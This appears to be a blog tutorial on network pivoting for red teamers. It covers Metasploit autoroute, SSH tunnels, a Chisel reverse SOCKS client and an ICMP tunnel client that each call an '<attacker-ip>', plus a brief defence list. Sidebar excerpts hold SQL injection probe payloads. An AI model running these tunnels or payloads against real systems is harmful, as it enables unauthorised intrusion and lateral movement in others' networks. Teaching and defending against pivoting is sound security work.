Skip to main content

Pivoting Commands

Pivoting for Red Teamers

Pivoting in Red Team Operations: A Complete Guide

Introduction

In a real-world red team operation, gaining initial access is just the beginning. The real challenge is pivoting—the ability to move laterally, escalate privileges, and compromise additional systems within the network.

What is Pivoting?

Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable.

Types of Pivoting

  • Network Pivoting: Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains).
  • Port Forwarding: Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding).

Step 1: Pivoting Using Metasploit

Setting Up a Pivot via Meterpreter

meterpreter> background
run autoroute -s 192.168.1.0/24

Now, all traffic destined for 192.168.1.0/24 will be routed through this compromised host.

Step 2: Pivoting with SSH Tunneling

Using Local Port Forwarding

ssh -L 8080:192.168.1.100:80 user@pivot-host

Using Dynamic Port Forwarding (SOCKS Proxy)

ssh -D 9050 user@pivot-host

Step 3: Pivoting with Chisel

Setup on Attacker Machine

./chisel server --reverse --port 8080

Setup on Compromised Host

./chisel client <attacker-ip>:8080 R:1080:socks

Step 4: Pivoting with RDP (Remote Desktop Protocol)

plink.exe -ssh -L 3389:192.168.1.100:3389 user@pivot-host

Step 5: Exploiting Firewall Rules with ICMP Tunnel

Start ICMP Server on Attacker Machine

./icmp-server eth0

Start ICMP Client on Compromised Host

./icmp-client <attacker-ip>

How to Defend Against Pivoting Attacks

  • Segment Networks – Isolate DMZ, internal, and user networks.
  • Use Firewalls – Block unnecessary outbound traffic.
  • Monitor SOCKS & Proxy Usage – Detect unusual traffic.
  • Implement EDR Solutions – Detect tunneling and backdoors.
  • Disable Unused Services – Prevent lateral movement.

Conclusion

Pivoting is a critical skill for red teamers, allowing attackers to move deeper into a network after initial access.

⚠️ Reminder: These techniques should only be used for legal penetration testing and red team assessments.

The above code can be automated via customer script

Comments

Post a Comment

Popular posts from this blog

Powershell Automation Basics - Part 1

Pentest Notes: PowerShell Automation - Basics Pentest Notes: PowerShell Automation - Basics These notes cover PowerShell automation for penetration testing, focusing on practical applications and techniques. What is PowerShell? A powerful scripting language and command-line shell built on the .NET framework, heavily integrated with Windows. Ideal for system administration and automation, making it a valuable tool for pentesters. Why PowerShell for Pentesting? Native to Windows: Pre-installed on most Windows systems. Object-oriented: Allows for complex data manipulation and interaction with APIs. Access to .NET Framework: Enables interaction with a vast library of classes and functions. Remoting capabilities: Execute commands on remote systems. Bypass security restrictions: Can be used to circumvent some security measures if not properly configured. Basic Syntax Cmdlets: Commands in PowerShell (e.g., Get-Process , Get-Service , Get-ChildItem ). P...
Post a Comment
Read more

SQLDB Pentest

Pivoting for Red Teamers SQL Database & SQL Injection Pentesting Cheat Sheet SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques. Step 1: Identifying SQL Database Type Check the database type by sending payloads in the input fields or URL: ' OR 1=1 -- (MySQL, PostgreSQL, MSSQL) ' UNION SELECT 1,2,3 -- (Check column count) ' AND 1=CONVERT(int,@@version) -- (MSSQL Test) Observe the error messages for database identification. Step 2: Enumerating Database Tables & Columns Use SQL queries to extract database structure. For MySQL: SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE(); SELECT column_name FROM information_schema.columns WHERE table_name='user...
Post a Comment
Read more

DAMN BASH

Bash Scripting: From Basic to Advanced Bash Scripting: From Basic to Advanced Bash (Bourne Again SHell) is a powerful command-line interpreter and scripting language commonly used in Linux and macOS environments. This post covers Bash scripting from basic commands to more advanced techniques. I. Basic Commands These commands are the building blocks of Bash scripting: Command Description ls Lists files and directories. cd Changes the current directory. pwd Prints the current working directory. mkdir Creates a new directory. rm Removes files or directories (use with caution!). cp Copies files or directories. mv Moves or renames files or directories. cat Displays file content. echo Prints text to the console. II. Variables Variables store data that can be used in your scripts: name="John Doe" echo "Hello, $name!" age=30 echo $((age + 5)) # Arithmetic operations III. Input/Output Redirection Redirect input an...
Post a Comment
Read more